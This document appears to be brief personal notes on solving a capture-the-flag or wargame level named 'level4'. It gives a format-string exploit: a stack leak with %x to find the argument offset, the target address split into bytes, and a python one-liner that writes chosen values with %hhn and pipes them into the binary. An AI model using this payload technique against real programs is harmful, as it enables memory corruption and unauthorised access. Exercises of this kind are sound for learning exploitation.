
/////find this cmp, who block access to system call

cmp    $0x01025544,%eax


/////write this to find offset

String to found : 25 78 f5 f5 (%x__)

b7ff26b0___bffff734___b7fd0ff4___0___0___bffff6f8___804848d___bffff4f0___200___b7fd1ac0___b7ff37d0___5f5f7825


11 arg before string witre

01(1) 
02(2)
55(85)
44(68)

Were to send 0x8049810

\x08\x04\x98\x10
\x08\x04\x98\x11
\x08\x04\x98\x13
\x08\x04\x98\x12


120 char (environ 30 arg)


(python -c 'print ".%44$hhn.%43$hhn" + "A" * (68-2) + "%41$hhn" + "A" * (85-68) + "%42$hhn" + "...\x10\x98\x04\x08\x11\x98\x04\x08\x12\x98\x04\x08\x13\x98\x04\x08"') | ./level4

